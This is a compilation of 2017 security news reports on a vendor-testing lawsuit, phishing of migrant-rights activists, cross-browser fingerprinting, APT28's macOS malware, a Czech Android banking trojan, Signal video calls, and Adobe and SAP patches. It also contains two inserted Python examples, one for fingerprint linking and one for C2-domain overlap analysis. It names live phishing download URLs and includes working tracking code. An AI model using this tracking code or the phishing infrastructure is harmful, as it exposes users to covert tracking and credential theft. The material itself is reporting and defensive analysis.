CrowdStrike explained the background in a blog post yesterday. It filed suit, it said, to hold NSS "accountable for unlawfully accessing our software, breaching our contract, pirating our software, and improper security testing. Regardless of test results (which we have not seen), CrowdStrike is making a stand against what we believe to be unlawful conduct."

CrowdStrike had earlier commissioned NSS to undertake a private test of its products, but was dissatisfied with the test methods, calling them "deeply flawed". Because of this it decided not to participate in the subsequent public test, and prohibited NSS from using its software. But according to CrowdStrike, NSS "colluded with a reseller and engaged in a sham transaction to access our software to conduct the testing. In doing so, NSS breached their contract with CrowdStrike, violated our end user licensing agreement (EULA), misappropriated our intellectual property, and improperly used credentials. Once we became aware that an unauthorized user account associated with a reseller was used for the tests, we suspended access immediately. Any test results that NSS did obtain are incomplete and materially flawed."

Product testing has long been a problem for the newer endpoint protection companies. In June 2016, Sophos blasted Cylance, and added, "when the playing field is leveled, and Cylance's product comes under real scrutiny, the company cries foul, puts the fear of lawsuits into the minds of its partners, and accuses others of 'smoke and mirrors' tactics."

Now the threat of a lawsuit has become a reality between CrowdStrike and NSS Labs. In the meantime, many of the new endpoint protection companies, including Cylance, have modified their attitudes. Cylance was amongst the tested products, as were SentinelOne and Invincea. These last three did rather well in the overall scores: Cylance at 99.69%, SentinelOne at 99.79%, and Invincea at 99.49%. CrowdStrike did less well at 74.17% -- but as CrowdStrike claimed, the results 'are incomplete'; and as NSS Labs admits, "The Falcon Host's final rating may have been different had it completed the test."

There are two primary issues here: is it possible to conduct fair comparative tests for advanced endpoint protection products (aka, machine-learning or next-gen AV); and is the law a valid method of preventing them?

Opinions differ on the first. David Harley blogged in WeLiveSecurity on Monday (although I understand it was written well before this current issue): Next-gen security software: 'Myths and marketing'. Quoting a question I asked him months ago (basically, is there any way to compare 1st- and 2nd-gen AV products), he said, "yes, of course there is."

Vesselin Bontchev, who is possibly the ultimate culprit ("I practically invented independent competent anti-virus testing while I was working at the Virus Test Center at the University of Hamburg in the early '90s") takes the opposite view. He believes that neither products nor testing are anywhere near as competent as they should be. "Whenever there is a major conflict, like this CrowdStrike vs NSS Labs story," he wrote yesterday, "you can usually bet that both sides are in the wrong. CrowdStrike probably have a crappy product they want to sell and didn't like the test results, while NSS Labs probably has a crappy and/or incomplete testing methodology and CrowdStrike found some legitimate flaws in it."

The law, however, is a heavy instrument to prevent public testing. SecurityWeek asked NSS to comment, and was told via email by CEO Vikram Phatak, "While CrowdStrike's request for a Temporary Restraining Order and Preliminary Injunction were denied by the Federal court, they are still suing us at present, and so we are limited in what we can say. Whether or not it is their intent, their suit has the effect of keeping us from debating the facts publicly.

"We obviously disagree and are disappointed with CrowdStrike's characterization of NSS as portrayed in their recent blog post... And as far as Crowdstrike's suit against NSS, we believe the judge's ruling and memorandum speak for themselves."

SecurityWeek also approached CrowdStrike, the Anti-Malware Testing Standards Organization (of which both CrowdStrike and NSS Labs are members), and another independent test lab for comments. We have so far received no response (although an informal reply from CrowdStrike did say, "Things are moving quickly today. Keep an eye on your inbox for an update"). If any comments are received they will be added as an update to this post.

Meanwhile, customers are left with an ongoing problem: can test results be trusted? There is no easy answer to this. The best solution is for customers to insist on on-site trial periods to see whether a preferred solution is actually up to the job.


Amnesty Warns of Phishing Attacks on Qatar Activists

15.2.2017 securityweek Phishing

Human rights watchdog Amnesty International has uncovered a sophisticated phishing campaign targeting journalists, activists and other entities in Nepal and Qatar interested in migrants' rights.

The campaign, dubbed Operation Kingphish, involves an online persona named “Safeena Malik” – Malik can mean “king” in Arabic. Amnesty International learned that Safeena Malik had contacted several individuals via email and social media over the course of 2016.

Safeena Malik, who claimed to be an activist interested in human rights, had accounts on several social media websites, including Twitter, Facebook and LinkedIn. “She” reached out to dozens of people, many involved in the issue of migrants’ rights in Qatar.

Safeena Malik fake profile

Qatar has attracted the attention of several human and labor rights organizations for its exploitation of migrant workers, many of whom are from Nepal. Some of the documented cases are related to the construction of stadiums and infrastructure for the FIFA World Cup competition that will be hosted by Qatar in 2022.

According to Amnesty, many of the attacks launched using the fake Safeena Malik profiles attempted to lure targeted individuals to realistic Google phishing pages. In order to avoid raising suspicion, the phishing pages displayed the email address and profile picture of the targeted user, and a legitimate document was displayed once the password had been handed over to the attacker.

Documents on human trafficking and ISIS funding, and fake Google Hangouts invitations were used to lure targeted users to the phishing pages. Safeena Malik also sent out private messages on Facebook to obtain the Gmail addresses of the targets.

The persona had hundreds of connections on social media and often joined groups focusing on migrant workers and forced labor in an effort to identify potential targets and make it appear as if “she” was part of the community.

Amnesty identified 30 different targets by analyzing the profile pictures hosted on the server used by the attacker to deliver the phishing pages, although the organization believes the actual number is much higher.

“Most identified targets were activists, journalists, and labour union members. While some of targets had published critical opinions about Qatar’s international affairs, the majority of identified targets were affiliated with organisations supporting migrant workers in Qatar,” said activist and security researcher Claudio Guarnieri. “Interestingly, a significant number of them are from Nepal, which is one of the largest nationalities amongst migrant workers in Qatar, and a country that has featured prominently in the migrant worker narrative on Qatar.”

While experts could not find much evidence, they believe the attacks were likely carried out by a state-sponsored actor. One of the IP addresses used to access some of the compromised email accounts had been associated with an ISP headquartered in Doha, Qatar.

However, when contacted by Amnesty, the government of Qatar denied any involvement and expressed interest in stopping the attacks. Experts pointed out that the operation could be the work of an actor that seeks to damage Qatar’s reputation.

This is not the only social engineering campaign targeting human and labor rights organizations focusing on the situation in Qatar. In December, Amnesty International published a report detailing a fake human rights organization named Voiceless Victims. It is unclear if the two campaigns are directly connected.


Websites Can Now Track You Online Across Multiple Web Browsers
15.2.2017 thehackernews Security

You might be aware of websites, banks, retailers, and advertisers tracking your online activities using different Web "fingerprinting" techniques even in incognito/private mode, but now sites can track you anywhere online — even if you switch browsers.
A team of researchers has recently developed a cross-browser fingerprinting technique — the first reliable technique to accurately track users across multiple browsers based on information like extensions, plugins, time zone and whether or not an ad blocker is installed.
Previous fingerprinting methods usually only work across a single browser, but the new method uses operating system and hardware level features and works across multiple browsers.
This new fingerprinting technique ties the digital fingerprint left behind by a Firefox browser to the fingerprint from a Chrome browser or Microsoft Edge running on the same device.
This makes the method particularly useful to advertisers, enabling them to continue serving targeted advertisements to online users, even if they avoid them by switching browsers.
The new technique can be found in a research paper titled (Cross-)Browser Fingerprinting via OS and Hardware Level Features [PDF] by Lehigh University’s Yinzhi Cao and Song Li, and Washington University in St. Louis’ Erik Wijmans.
The cross-browser fingerprinting technique relies on "many novel OS and hardware features, especially computer graphics ones" that are slightly different for each computer.
For example, the technology can be used to identify the machine by performing 20 unique WebGL tasks while rendering 3D graphics in web browsers with carefully selected computer graphics parameters, such as texture, anti-aliasing, light, and transparency.
In total, 36 of the features are independent of any particular browser, meaning they are not confined to one specific web browser on the machine.
The features currently tested include time zone, number of CPU cores, GPU, hash values of GPU rendering results, plugins, fonts, audio, screen ratio and depth, WebGL, ad blocking, canvas, cookies, encoding, and language.
The researchers provided both a practical demonstration as well as open source code online on GitHub. They performed a test which involved 3,615 fingerprints and 1,903 users and found that their method successfully identified 99.2% of users.
On the other hand, a single-browser fingerprinting technique called AmIUnique had a success rate of 90.8%.
"This approach is lightweight, but we need to find all possible fingerprintable places, such as canvas and audio context: If one place is missing, the browser can still be somehow fingerprinted. We leave it as our future work to explore the correct virtualization layer," the paper notes.
The researchers also noted that this new cross-browser fingerprinting technique is not too bad, as in some cases, the method can be used as part of stronger multi-factor user authentications across multiple browsers.
For example, banks can use this technique to check whether a user logging into an online account is on the computer that has been used on every previous visit, confirming the login is legitimate even if the user has switched to a different browser than usual.
The researchers plan to present their paper at the Network and Distributed System Security Symposium scheduled for February 26 through March 1 in San Diego, California.
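To make the browser-level versus OS/hardware-level distinction concrete, here is an added simulation (not code from the paper or its GitHub repository) over constructed feature records for two browsers on one laptop and a third browser on a different laptop. The feature split, the values and the render-hash stand-ins are the example's own assumptions; the real technique derives the hashes from WebGL rendering, which this script does not do.

```python
"""Constructed example: why a fingerprint built only from OS- and
hardware-level features links sessions across browsers, while one that
also includes browser-level features does not. All values are made up;
'render-hash-*' strings stand in for real WebGL rendering hashes."""
import hashlib
import json

# The example's own simplification of the paper's grouping: features that
# change when the browser changes versus features that belong to the device.
BROWSER_LEVEL = ("user_agent", "plugins", "fonts_enumerable")
DEVICE_LEVEL = ("time_zone", "cpu_cores", "gpu", "webgl_render_hash",
                "screen_ratio", "color_depth", "ad_blocker")

# Constructed observations: Firefox and Chrome on laptop A, Chrome on laptop B.
OBSERVATIONS = {
    "laptop_a_firefox": {
        "user_agent": "Mozilla/5.0 (Windows NT 10.0) Firefox/51.0",
        "plugins": ["Shockwave Flash"],
        "fonts_enumerable": True,
        "time_zone": "America/New_York",
        "cpu_cores": 4,
        "gpu": "Intel(R) HD Graphics 520",
        "webgl_render_hash": "render-hash-A",
        "screen_ratio": "16:9",
        "color_depth": 24,
        "ad_blocker": True,
    },
    "laptop_a_chrome": {
        "user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/56.0",
        "plugins": ["Chrome PDF Viewer", "Widevine Content Decryption Module"],
        "fonts_enumerable": False,
        "time_zone": "America/New_York",
        "cpu_cores": 4,
        "gpu": "Intel(R) HD Graphics 520",
        "webgl_render_hash": "render-hash-A",
        "screen_ratio": "16:9",
        "color_depth": 24,
        "ad_blocker": True,
    },
    "laptop_b_chrome": {
        "user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/56.0",
        "plugins": ["Chrome PDF Viewer", "Widevine Content Decryption Module"],
        "fonts_enumerable": False,
        "time_zone": "America/New_York",
        "cpu_cores": 8,
        "gpu": "NVIDIA GeForce GTX 960",
        "webgl_render_hash": "render-hash-B",
        "screen_ratio": "16:10",
        "color_depth": 24,
        "ad_blocker": False,
    },
}


def fingerprint(observation: dict, keys: tuple) -> str:
    """Hash the selected features in a canonical (sorted-key JSON) form."""
    subset = {k: observation[k] for k in keys}
    canonical = json.dumps(subset, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode()).hexdigest()


def linked_sessions(observations: dict, keys: tuple) -> list:
    """Group sessions that the chosen feature set cannot tell apart.

    Returns a sorted list of sorted session-name lists, one per fingerprint.
    """
    groups = {}
    for session, obs in observations.items():
        groups.setdefault(fingerprint(obs, keys), []).append(session)
    return sorted(sorted(g) for g in groups.values())


def shared_device_features(a: dict, b: dict) -> tuple:
    """Device-level features two sessions have in common.

    From a defender's view, these are the values a privacy tool would have
    to vary per browser to break the cross-browser link.
    """
    return tuple(k for k in DEVICE_LEVEL if a[k] == b[k])


if __name__ == "__main__":
    print("single-browser:", linked_sessions(OBSERVATIONS, BROWSER_LEVEL + DEVICE_LEVEL))
    print("cross-browser: ", linked_sessions(OBSERVATIONS, DEVICE_LEVEL))
```

With all features hashed, the three sessions look like three different users; with device-level features only, the two laptop A browsers collapse into one identity while laptop B stays separate.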


Russian Cyberspies Use New Mac Malware to Steal Data

15.2.2017 securityweek Apple 
Researchers have discovered a new piece of malware used by the Russia-linked threat group known as APT28 to steal sensitive data from Mac devices, including backups and passwords.

APT28 is also tracked as Fancy Bear, Pawn Storm, Sofacy, Tsar Team, Strontium and Sednit. The threat actor has been linked to several high-profile attacks aimed at government and other types of organizations around the world, including the recent election-related hacker attacks in the United States.

APT28 has been known for using an OS X downloader named Komplex, and researchers from Bitdefender and Palo Alto Networks have now come across another Mac malware believed to be part of the group’s arsenal.

XAgent, or X-Agent, is a Trojan used by APT28 in attacks targeting Windows systems. A recently analyzed campaign aimed at Ukraine indicates that the group may have also developed an Android version of XAgent.

Bitdefender and Palo Alto Networks have also identified a macOS version of XAgent, which they believe is downloaded to targeted systems by the Komplex downloader. Both security firms determined, based on binary strings, that Komplex and XAgent were likely created by the same developer.

Once it infects a Mac computer, the malware, which its authors call XAgentOSX, contacts a command and control (C&C) server and waits for instructions. C&C communications are similar to the ones used by the Windows version of XAgent.

XAgentOSX can collect information about the system, running processes and installed applications, it can download and upload files, execute commands and files, and take screenshots.

The malware also looks for backup files from an iPhone or iPad, which it can exfiltrate using one of the available commands. XAgentOSX can also log keystrokes, allowing the attackers to obtain the victim’s credentials.

Bitdefender told SecurityWeek that it does not have any information on XAgentOSX infections and targets, but the company believes the victims are hand-picked in an effort to prevent the exposure of malware samples.

“Most likely, this sample is directed at the same audience that makes the focus of the APT28 group (government, airspace, telecom and, e-crime services). It most likely covers the instances in which targets in the respective groups use Macs as work or personal computers,” said Bogdan Botezatu, Senior E-Threat Analyst at Bitdefender.

APT28 is a sophisticated threat group whose arsenal includes a wide range of tools, including Linux malware. One of the actor’s favorite Linux tools is Fysbis, an unsophisticated yet efficient backdoor.


Signal introduced the Video call feature in public beta release
15.2.2017 securityaffairs Apple  

Signal, the most secure instant messaging app, has introduced the video call feature in a public beta release. You can test it now!
Signal is considered the most secure instant messaging app; a search for it on the Internet turns up Edward Snowden's endorsement:

“Use anything by Open Whisper Systems” Snowden says.
The cryptographer and Johns Hopkins University professor Matt Green and the popular security expert Bruce Schneier are two other admirers of the Signal app.

The news of the day is that the Signal app released its video calling feature on Tuesday for both Android and iOS.

The new feature allows Signal users to communicate face-to-face through video calling, with a specific focus on security.

The Signal video calling feature implements support for CallKit on iOS 10 devices, a recently introduced framework that lets VoIP apps integrate tightly with the native Phone UI.

CallKit in iOS 10 allows Signal users to answer calls just like regular calls, but there are some specific privacy issues that must be carefully considered.

“CallKit offers a native calling experience to VoIP apps like Signal. As well as being able to answer calls directly from your lock screen, you’ll also see Signal calls in the system’s “Recent Calls” list. This is because iOS treats CallKit calls like any other call, however that also means some information will be synced to iCloud if enabled. This information includes who you called and how long you talked.” wrote Moxie Marlinspike.

Signal iOS users can disable CallKit to enhance their privacy.

Signal's video calling feature is still in beta; in order to make a video call, both users will have to enable the feature.

If you want to try the new feature, go into your Signal settings and enable 'Video calling beta' under 'Advanced.'

“If you decide that’s not for you, you can opt-out of the CallKit features at any time in Settings > Advanced > Use CallKit, while continuing to use the rest of the new calling system.” continues Moxie Marlinspike.


Operation Kingphish: Cyber Attacks against human rights activists in Qatar and Nepal
15.2.2017 securityaffairs Cyber  

Amnesty International has recently uncovered a spear phishing campaign dubbed Operation Kingphish that targeted groups in Qatar and Nepal.
Human rights organizations and journalists continue to be a privileged target of phishing campaigns that attempt to steal the Google credentials of the victims. The malicious messages try to lure victims into viewing documents online.

Amnesty International has recently uncovered a spear phishing campaign that targeted groups in Qatar and Nepal by leveraging a fake social media profile; the attackers did not directly hit people working for Amnesty International.

The threat actor created a fictional rights activist named Safeena Malik.

Amnesty International dubbed the phishing campaign ‘Operation Kingphish’ because the surname “Malik” translates from Arabic as “King.”

“Over the course of 2016 — and particularly intensifying towards the end of the year — several individuals known to Amnesty International were approached via email and through social media by “Safeena Malik”, seemingly an enthusiastic activist with a strong interest in human rights.” reads a blog post published by popular researcher Claudio Guarnieri on Medium. “What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists, human rights defenders, trade unions and labour rights activists, many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal.”

The threat actors created profiles for the character “Safeena Malik” on every major social media platform, including Facebook, Google, LinkedIn, and Twitter. The information used by the attackers seems to have been harvested from another social media account.

“The various social media accounts communicated regularly with several of the victims we identified, often for many months. It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile, along with a professional biography also stolen from yet another person.” added Claudio Guarnieri.

Among the various profiles created for Safeena Malik, the most active appear to be the Facebook and LinkedIn ones (where the identity had accumulated more than 500 connections).

The LinkedIn profile has built a network composed of more than 500 connections. The attackers targeted individuals associated with the rights of migrant workers in Qatar, journalists, activists, and labor union officials.

A large number of workers from Nepal and other countries have been brought to Qatar to work with companies involved in the construction of stadiums and facilities for the 2022 World Cup, so human rights activists are concerned over the treatment of those workers. It has been estimated that more than 1,200 migrant workers from Nepal and India have already died.

Victims of the spear phishing campaign received malicious email and social media messages from “Safeena Malik,” who was asking them to view the content of documents or presentations on Qatari human rights issues.

Operation Kingphish

In other cases, the attackers were offering forged requests to link up via Google’s Hangouts chat service.

The phishing messages included links to a phishing site crafted specifically to trick visitors into providing their Google login credentials. Once the victims provided the credentials, they were redirected to an actual Google Docs document pilfered from another source to avoid suspicion.

Who is behind the Operation Kingphish?

“In the absence of clear evidence, trying to identify the entity behind this attack can only be speculative,” states Guarnieri.

Despite the lack of conclusive evidence, the fact that the spear phishing attacks specifically target individuals active on human rights issues in Qatar suggests the involvement of a state-sponsored actor.

“We believe it is also possible that these attacks have been orchestrated by contractors.” concluded Guarnieri.

The Qatari government has denied involvement in the Operation Kingphish campaign.


Another wave of malware targets Czech Android users. What can the Android/Spy.Banker.HO virus do?
15.2.2017 Živě.cz Android

Another wave of fake apps has arrived in the Czech Republic, this time impersonating DHL
Their goal is to steal online banking login credentials
How to defend against these scams?
Since at least mid-January we have been seeing several warnings every week about a malicious Android app that attackers spread via SMS. Most often they send messages impersonating one of the Czech banks, but Česká pošta (the Czech Post), the e-shop Alza and, in the latest case, the courier company DHL have not been spared either.

The attack pattern is always the same: the user receives an SMS with text relating to the given organisation and a request to download an app. Fake messages from Česká pošta contained a prompt to pick up a parcel at the depot; with banks, the attackers most often use a variant with an important notice that is to be read in the linked app; with Alza they promise a prize; and with DHL the app offers to change the delivery address for a package.

Two apps, the same malware. One impersonates the Česká pošta app, the other DHL; in most cases, however, it is named Flash Player 10 Update

The first tell-tale sign of a fraudulent app can be the address it is to be downloaded from. So far the attackers have always used a .online domain: for Alza it was http://alza-shop.online, for DHL it is now http://dhl-express.online, and for the post office the attackers used the appealing address http://ceskaposta.online. Thanks in part to these URLs, the messages can look legitimate to many users.

This is what a fraudulent message can look like; this one impersonates Česká pošta (photo: @TerezaChlubna)

Another common feature of these fraudulent apps is their minimal size. The downloaded APK installation package is always under 1 MB, and after installation the size of all the versions mentioned was around 1.4 MB. On launch the app naturally requests all system permissions, and if the user grants them, the app gets not only access to contacts but also, for example, the ability to read and send messages.

The app requests complete system permissions, which later allow it to access, for example, the verification SMS used to log in to online banking

The basic defence against this type of attack should above all be caution and common sense. If the user is not expecting a parcel from Česká pošta or DHL, or receives a message from a bank of which they are not a customer, fraud is the most likely explanation. A message from Alza promising a prize for installing an app can be more problematic, since some companies really might promote their apps this way. For all variants, however, the basic rule should apply: do not install apps from unknown sources and rely on the built-in Google Play store.

Fake banking

If the user installs the app, it runs in the background and waits for an opportunity to serve a fake login form for online banking. This can happen not only when the fraudulent app itself is launched, but also when other services are started. One variant of the Android/Spy.Banker malware displayed a form for entering payment details whenever one of the messaging apps was launched: Skype, Facebook Messenger, Hangouts, but also social networks such as Instagram or Twitter.

The app can also display forms for entering payment card details (photo: Fortinet)

In the Czech Republic, however, users will mostly encounter a localised variant adapted for Czech users. In the case of the latest attack, which uses the name of the carrier DHL, it is pure phishing: after the app is opened, a login form for ČSOB online banking is displayed. If the user enters their identification number and PIN code, the attackers have an easy job. They also have access to any verification SMS, thanks to the permission to read messages that was granted.

If the user launches the app, it serves a login form for online banking. It also has access to the verification SMS, and once the details are entered nothing stops it from taking over the account (photo: ČSOB)

The Android/Spy.Banker trojan currently threatens mainly Eastern Europe, as can also be seen on Eset's map. It had already spread in the autumn of last year, when in its original form it was used to steal online banking credentials in Germany, France and Austria and, to a lesser extent, Poland and the United States.

Android/Spy.Banker is currently thriving mainly in Eastern Europe, most of all in Russia and Slovakia (photo: Eset)

The current wave of attacks is dangerous above all because of its careful localisation, both of the delivered messages, in which we find no errors, and of the aforementioned domains, which really do look official. If you have launched the app and entered your details into it, do not hesitate to contact your bank's customer line. Uninstall the app in the usual way via Android settings and the Apps menu. Very often it is named Flash Player 10 Update, but in some cases the attackers have changed the name to DHL or Česká pošta.


Signal Messaging App Rolls Out Encrypted Video Calling
15.2.2017 thehackernews Apple
WhatsApp and Facebook so far have the largest end-to-end encrypted video calling network of all, but now another popular end-to-end encrypted messaging app, one recommended by whistleblower Edward Snowden, is ready to give them really tough competition.
The Signal app, which is widely considered the most secure of all encrypted messaging apps, released its video calling feature on Tuesday for both Android and iOS in a new update.
Developed by the open source software group Open Whisper Systems, Signal is a free and open source messaging application designed for Android and iOS users to exchange secure, encrypted messages and voice calls.
The Signal Protocol also powers the end-to-end encryption built into WhatsApp, Facebook Messenger, and Google Allo's Incognito mode.
Signal has already been providing fully end-to-end encrypted chat and voice calling, but the newly added feature will make it even easier for privacy-conscious people to communicate face-to-face through video calling without compromising security.
Watch Out! There's a Privacy issue too!

This new video calling feature also comes with support for CallKit on iOS 10 devices, a new framework that makes Signal act more like the regular phone app.
CallKit in iOS 10 allows Signal users to answer calls with one touch from their device's lock screen and lists those calls in the device's native "Recent Calls" just like regular calls, possibly making it inconvenient for privacy-minded people.
CallKit is optional, and if users decide to opt-in this feature, some of their data might sync to Apple's iCloud servers, including who the Signal users called and how long they had the conversation, Signal's pseudonymous lead designer Moxie Marlinspike explains in a blog post.
The CallKit feature can be turned off within your iOS device's settings to enhance your privacy.
Currently, Signal’s video calling feature is in beta, which means both users will have to manually enable the feature for video calling to work.
To try out video calling in Signal, you will have to go into your Signal settings and enable 'Video calling beta' under 'Advanced.'


Bitdefender found the first Mac OS version of the X-Agent used by APT28
15.2.2017 securityaffairs APT

Security experts at Bitdefender discovered a Mac OS version of the X-Agent malware used by the Russian APT28 cyberespionage group.
Security experts at Bitdefender have discovered a Mac OS malware program that is likely part of the arsenal of the dreaded Russian APT28 group (aka Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team). The Russian nation-state actor was involved in the cyber attacks against the U.S. Democratic National Committee during the 2016 presidential election.

X-Agent APT 28

The researchers believe the group developed a piece of malware called Sofacy or X-Agent that has been associated only with its espionage campaigns.

The experts have observed several strains of X-Agent specifically designed to compromise Windows, Linux, iOS and Android.

Now researchers at Bitdefender have spotted the first version of X-Agent developed to compromise Mac OS systems.

The security firm hasn’t revealed how it discovered the Mac OS version of X-Agent, and currently there is no information on the attack chain.

“APT 28 operators have upped their game – the Xagent payload now can target victims running Mac OS X to steal passwords, grab screens and steal iPhone backups stored on the Mac.” reads the analysis published by Bitdefender.

The X-Agent is a modular backdoor that was most likely planted on the target machines via the Komplex downloader.

The X-Agent malware is able to load additional modules; it can be used as a backdoor or to perform reconnaissance on the target system by gathering information about the hardware and software components of the compromised host.

In September 2016, Palo Alto researcher Ryan Olson discovered that Fancy Bear used the Komplex trojan to target organizations in the aerospace sector that were using the MacKeeper antivirus software.

“The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system. During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload.” reads the analysis published by PaloAlto in September 2016. “Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows. In addition to shared code and functionality, we also discovered Komplex command and control (C2) domains that overlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.”

The Komplex malware has numerous similarities with the Carberp trojan; it was improved to gain access to both PC and OS X systems, and it uses the same command-and-control server.

The researchers noticed that Komplex’s C2 domain appleupdate[.]org was not used in the past by the group, while both the apple-iclouds[.]net and itunes-helper[.]net domains have direct ties to the activity of the APT 28.

The new MAC OS X-Agent leverages domain names similar to the ones used by the Komplex Trojan, differing only in the TLD. The researchers also noticed identical project path strings inside both the Komplex and X-Agent samples, a circumstance that suggests the involvement of the same development team.

“Other indicators show that today’s sample also reports to a C&C URL that is identical to the Sofacy/APT28/Sednit Komplex OSX Trojan, minus the TLD (apple-[*******].net for Komplex vs apple-[*******].org for Xagent).” states Bitdefender.

In summary, the Komplex component discovered in September 2016 has been used exclusively as a downloader and installer for the X-Agent binary.
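The infrastructure overlap described above (the same second-level label registered under two TLDs, one for Komplex and one for X-Agent) is the kind of pivot a threat-intel analyst repeats whenever two sample sets are compared. The following is an added example and not code from Bitdefender or Palo Alto Networks; the domain names in it are constructed placeholders written in the defanged "[.]" notation that reports use, not the redacted real indicators, and the function names are the example's own.

```python
"""
Added example (not from the Bitdefender or Palo Alto analyses): group C2
indicators from two campaigns by their second-level label so that domains
that differ only in the TLD surface as shared infrastructure.
"""
import re
from collections import defaultdict

# Constructed sample indicators in defanged notation. None of these are the
# real domains from the article, which are partly redacted there.
KOMPLEX_C2 = ["sample-update[.]net", "hxxp://sample-helper[.]net/", "other-cdn[.]net"]
XAGENT_C2 = ["sample-update[.]org", "sample-helper[.]org", "unrelated-host[.]com"]


def refang(indicator):
    """Turn defanged 'a[.]b' / 'hxxp://' notation back into a plain hostname."""
    host = indicator.strip().lower()
    host = re.sub(r"^hxxps?://", "", host)
    host = host.replace("[.]", ".").replace("(.)", ".")
    return host.split("/", 1)[0]  # drop any path component


def split_label_tld(host):
    """Return (label, tld) for single-label TLDs such as .org or .net.
    Multi-part suffixes (co.uk) would need a public-suffix list; that is
    out of scope for this example."""
    label, _, tld = host.rpartition(".")
    return label, tld


def tld_overlap(set_a, set_b):
    """Map each second-level label present in BOTH sets to the TLDs each
    set uses for it, e.g. {'sample-update': {'a': {'net'}, 'b': {'org'}}}."""
    by_label = defaultdict(lambda: {"a": set(), "b": set()})
    for indicator in set_a:
        label, tld = split_label_tld(refang(indicator))
        by_label[label]["a"].add(tld)
    for indicator in set_b:
        label, tld = split_label_tld(refang(indicator))
        by_label[label]["b"].add(tld)
    return {label: sides for label, sides in by_label.items()
            if sides["a"] and sides["b"]}


if __name__ == "__main__":
    for label, sides in sorted(tld_overlap(KOMPLEX_C2, XAGENT_C2).items()):
        print(f"{label}: set A uses {sorted(sides['a'])}, set B uses {sorted(sides['b'])}")
```

The overlap alone is a lead, not attribution; the article pairs it with the identical project path strings before concluding that the same team is behind both samples, and an analyst should do the same.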

The investigation is ongoing … stay tuned!


Adobe just fixed thirteen code execution flaws in Flash Player
15.2.2017 securityaffairs Vulnerebility

Adobe addressed thirteen critical code execution vulnerabilities in Flash Player for Windows, MAC OS, and Chrome.
Adobe released security updates that address two dozen vulnerabilities in Flash Player, Digital Editions, and the Campaigns marketing tool.

Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. The updates address critical vulnerabilities that could be exploited by an attacker to take control of the vulnerable system.

Flash Player 24.0.0.221 addressed 13 critical code execution flaws, including type confusion, integer overflow, use-after-free, heap buffer overflow and other memory corruption issues.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system.” reads the Adobe Security Advisory for the Flash product.

The flaws were discovered by researchers at Google Project Zero, Microsoft, Palo Alto Networks, Fortinet’s FortiGuard Labs and CloverSec Labs, who reported the security issues to Adobe.

Nine flaws affecting the Digital Editions ebook reader were also fixed by Adobe with the release of version 4.5.4 for Windows, Mac, and Android.

Adobe fixed several kinds of vulnerabilities including a critical heap-based buffer overflow that can be exploited for arbitrary code execution and several important buffer overflows that could lead to a memory leak.

The flaws were discovered by the researcher Steven Seeley of Source Incite and Ke Liu of Tencent’s Xuanwu LAB.

“Adobe has released a security update for Adobe Digital Editions for Windows, Macintosh and Android. This update resolves a critical heap buffer overflow vulnerability that could lead to code execution and important buffer overflow vulnerabilities that could lead to a memory leak.” reads the Adobe Security Advisory for the Digital Editions product.


The last set of flaws affected the Adobe Campaign product for Windows and Linux. The release of Adobe Campaign 6.11 addresses a moderate severity security bypass flaw affecting the client console, which could be exploited by an authenticated attacker to upload and execute a malicious file, potentially resulting in read/write access to the system.

Adobe also fixed another flaw in the latest version of Campaign, a moderate severity input validation issue that can be exploited for cross-site scripting (XSS) attacks. The flaws were reported to Adobe by researcher Léa Nuel.

“Adobe has released a security update for Adobe Campaign v6.11 for Windows and Linux. This update resolves a moderate security bypass affecting the Adobe Campaign client console. An authenticated user with access to the client console could upload and execute a malicious file, potentially resulting in read and write access to the system (CVE-2017-2968). This update also resolves a moderate input validation issue that could be used in cross-site scripting attacks (CVE-2017-2969).” reads the Adobe Security Advisory for the Adobe Campaign product.


SAP Patches 22 Vulnerabilities With February 2017 Security Updates

14.2.2017 securityweek Vulnerebility
SAP on Tuesday announced the release of its February 2017 security updates, which includes 15 Patch Day Security Notes and 3 updates to previously released Patch Day Security Notes.

Only High risk and Medium severity vulnerabilities were addressed this month, with the highest CVSS score of the vulnerabilities being 8.5. Multiple patches were released for SAP's HANA database management system.

According to ERPScan, a company specialized in securing SAP and Oracle products, SAP’s February 2017 Security Patch Day also saw the release of 7 Support Package Notes, for a total of 22 patches across products. 7 of the patches were rated High risk, while the remaining 15 were assessed as Medium severity.

The most common vulnerability type addressed this month is Missing Authorization check (5 patches), followed by Cross-Site Scripting (4 patches), denial of service (3 patches), and XML external entity (2 patches). The remaining 8 flaws include: directory traversal, implementation flaw, privilege escalation, buffer overflow, ABAP code injection, cross-site request forgery, clickjacking, and multiple issues.

The most important issues addressed this month include a Missing Authorization Check vulnerability (CVSS Base Score: 8.5) in SAP Netweaver Data Orchestration (which could allow an attacker to access the service without authorization and use service functionality that has restricted access), along with an Implementation flaw vulnerability (CVSS Base Score: 8.2) in SAP GRC Access Control EAM (which can cause unpredictable behavior of a system, troubles with stability and safety).

Additionally, SAP patched a Memory Corruption vulnerability (CVSS Base Score: 8) in SAP 3D Visual Enterprise Author, Generator and Viewer, which could allow an attacker to inject specially crafted code into working memory, where it would be executed by the vulnerable application (the executed commands run with the same privileges as the service that executed them).

Three of the issues were disclosed by ERPScan researchers, including multiple vulnerabilities in SAP HANA (CVSS Base Score: 8.3), namely a denial of service that could allow an attacker to crash a process of a vulnerable component and an Implementation Flaw (insecure default user creation policy) in the third-party repository server Sinopia, and an XML external entity vulnerability in SAP Visual Composer VC70RUNTIME (CVSS Base Score: 6.5).

